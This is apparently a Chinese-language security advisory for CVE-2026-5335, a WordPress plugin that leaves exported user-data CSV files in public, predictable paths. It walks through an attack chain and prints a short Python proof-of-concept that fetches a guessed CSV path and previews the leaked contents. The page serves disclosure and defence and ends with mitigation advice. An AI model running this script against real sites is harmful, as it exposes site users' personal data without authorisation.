CVE-2026-5335 CVSS 5.3 中危

CVE-2026-5335 WordPress插件敏感信息泄露

披露日期: 2026-05-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5335

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Magic Export & Import WordPress Plugin

漏洞概述

CVE-2026-5335 是 WordPress 插件 Magic Export & Import 中的一个安全漏洞。在版本 1.2.0 之前，该插件将导出的 CSV 文件存储在网站公开可访问的目录下，缺乏有效的访问控制机制。未经身份验证的攻击者可以通过直接访问文件 URL 获取敏感用户信息。该漏洞 CVSS 评分为 5.3，属于中危级别，且无需用户交互即可被利用。

技术细节

该漏洞的根本原因在于插件对导出文件的存储位置缺乏安全限制。当管理员使用 Magic Export & Import 插件导出数据时，插件生成的 CSV 文件被放置在 Web 服务器的公开目录（例如 uploads 目录）下，且文件名通常具有可预测性。攻击者无需登录后台，只需通过构造特定的 HTTP 请求（如猜测 URL 路径）即可直接下载这些 CSV 文件。由于文件包含用户敏感数据，这构成了严重的信息泄露风险。CVSS 向量显示攻击复杂度低，无需特权，网络可达，进一步增加了被自动化扫描工具利用的可能性。

攻击链分析

STEP 1

侦察

攻击者识别目标站点正在使用 WordPress，并检测是否安装了 Magic Export & Import 插件。

STEP 2

探测

攻击者尝试访问插件默认的导出文件存储路径，或通过目录枚举寻找 CSV 文件。

STEP 3

利用

直接向预测的 URL 发送 HTTP GET 请求，无需认证即可下载文件。

STEP 4

数据窃取

分析下载的 CSV 文件内容，提取敏感用户信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_cve_2026_5335(base_url):
    # Predictable path for exported CSV files in vulnerable versions
    # The exact path might vary, but usually resides in uploads
    # Example path based on common plugin behavior
    target_url = f"{base_url}/wp-content/uploads/magic-export-export.csv"
    # Note: Actual path may require directory enumeration or specific timestamp guessing
    
    try:
        response = requests.get(target_url, timeout=5)
        if response.status_code == 200:
            print(f"[+] Vulnerable! Sensitive data leaked at: {target_url}")
            print(f"[+] Content preview: {response.text[:100]}")
        else:
            print(f"[-] Not detected or fixed. Status code: {response.status_code}")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    target_site = "http://example.com"
    check_cve_2026_5335(target_site)

影响范围

Magic Export & Import < 1.2.0

防御指南

临时缓解措施

如果无法立即升级，建议通过 Web 服务器配置（如 .htaccess 或 Nginx 规则）限制对导出目录的访问权限，或暂时禁用插件功能，防止敏感数据继续暴露。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表